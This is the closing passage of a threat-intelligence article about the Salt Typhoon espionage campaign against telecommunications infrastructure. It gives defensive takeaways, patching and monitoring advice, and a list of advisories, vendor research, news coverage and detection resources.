- Contribute IOCs to community platforms. MISP, OTX, ThreatConnect—help the community.
Conclusion: The 100-Year Strategy
Salt Typhoon represents a new paradigm in nation-state cyber operations. This is not opportunistic cybercrime or smash-and-grab data theft. This is systematic, patient, and strategic intelligence collection executed by a well-resourced state apparatus with generational time horizons.
The Norwegian disclosure adds another chapter to what is already the most significant telecommunications breach in history. But the geographic expansion tells us something important: Salt Typhoon is not slowing down. They are accelerating.
Key Takeaways
- The threat is global and ongoing. 200+ organizations across 80 countries. The campaign continues.
- Edge devices are the attack surface. Routers, switches, firewalls, VPN concentrators—the infrastructure you probably don't monitor as closely as endpoints.
- Known vulnerabilities enable nation-state attacks. CVEs from 2018 are still being exploited. Patching network infrastructure is non-negotiable.
- Detection requires new approaches. Traditional endpoint security doesn't see infrastructure compromise. Configuration monitoring, integrity verification, and container auditing are essential.
- Allied nations are being systematically targeted. If your organization operates in telecommunications, energy, defense, or maritime—or if you have partners in Norway, Canada, UK, Australia, or other Five Eyes nations—you are in the target zone.
The Call to Action
The FBI's $10 million bounty, the 25-agency CISA advisory, and Norway's unprecedented public disclosure all point to the same conclusion: this is the most serious cyber espionage threat facing Western critical infrastructure today.
Your organization's response should reflect that reality:
- If you haven't patched Salt Typhoon CVEs, patch them today.
- If you don't have network device configuration baselines, create them this week.
- If you're not monitoring Guest Shell and container activity on Cisco devices, start immediately.
- If you haven't conducted a threat hunt for Salt Typhoon TTPs, commission one now.
The threat actors behind Salt Typhoon are playing a long game. They're patient. They're well-resourced. And they're already inside networks that don't know they're compromised.
Don't be one of them.
References and Resources
Government Advisories
- CISA Advisory AA25-239A: Countering Chinese State-Sponsored Actors - August 27, 2025
- Norwegian PST National Threat Assessment 2026 - February 6, 2026
- US Treasury Sanctions Press Release - January 17, 2025
- FBI Most Wanted - Salt Typhoon Operators - April 2025
Vendor Research
- Trend Micro: Game of Emperor - Earth Estries Intrusions - November 25, 2024
- Eclypsium: Detecting and Mitigating Salt Typhoon - February 19, 2025
- DomainTools: Inside Salt Typhoon - January 6, 2026
- Picus Security: Salt Typhoon Threat Analysis - December 20, 2024
News Coverage
- TechCrunch: China's Salt Typhoon Hackers Broke Into Norwegian Companies - February 6, 2026
- The Record: Norwegian Intelligence Discloses Salt Typhoon Attacks - February 6, 2026
- Ars Technica: FBI Offers $10 Million for Salt Typhoon Information - April 25, 2025
- Senate Commerce Committee: Cantwell Demands Carrier Accountability - February 3, 2026
Detection Resources
- Trend Micro YARA Rules for Earth Estries
- CISA IOC STIX Files (JSON and XML)
- MITRE ATT&CK - Salt Typhoon Techniques
This article was researched and written by the Breached.Company intelligence team to help security professionals understand and defend against the Salt Typhoon threat. For questions, additional IOCs, or to share intelligence, contact our research team.
